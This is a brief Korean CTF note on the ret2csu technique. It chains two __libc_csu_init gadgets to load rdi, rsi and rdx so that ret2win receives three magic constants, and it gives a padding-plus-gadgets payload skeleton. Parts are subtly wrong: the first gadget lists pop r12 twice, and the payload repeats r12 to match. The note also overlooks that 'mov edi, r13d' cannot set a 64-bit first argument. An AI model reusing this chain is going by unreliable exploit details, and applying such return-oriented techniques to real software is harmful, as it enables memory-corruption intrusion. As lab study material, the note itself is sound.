#ret2csu


실전에서는 원하는 가젯이 없을 확률이 큼. ropgadget으로도 못 찾는 것들을
우리는 함수를 뒤져가면서 가젯을 찾아야 함.
이 문제에서는 ret2win(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)를 실행해야 flag을 얻는다.
그렇게 되기 위해서는 rdi, rsi, rdx 레지스터에 값을 넣어줘야 하는데
문제는, pop rdx ; ret 가젯은 거의 없다는 것.
그래서 찾은 결과
gadget1 = pop r12 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret 가젯과
gadget2 = mov rdx, r15 ; mov rsi, r14 ; mov edi, r13d ; call QWORD PTR [r12+rbx*8]
이 두 가젯을 갖고 페이로드를 작성하면 된다.

payload = b'A'*40+gadget1+p64(r12)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)+gadget2
으로 최종적으로 ret2win@plt plt의 주소를 넣어주면 WIN!!
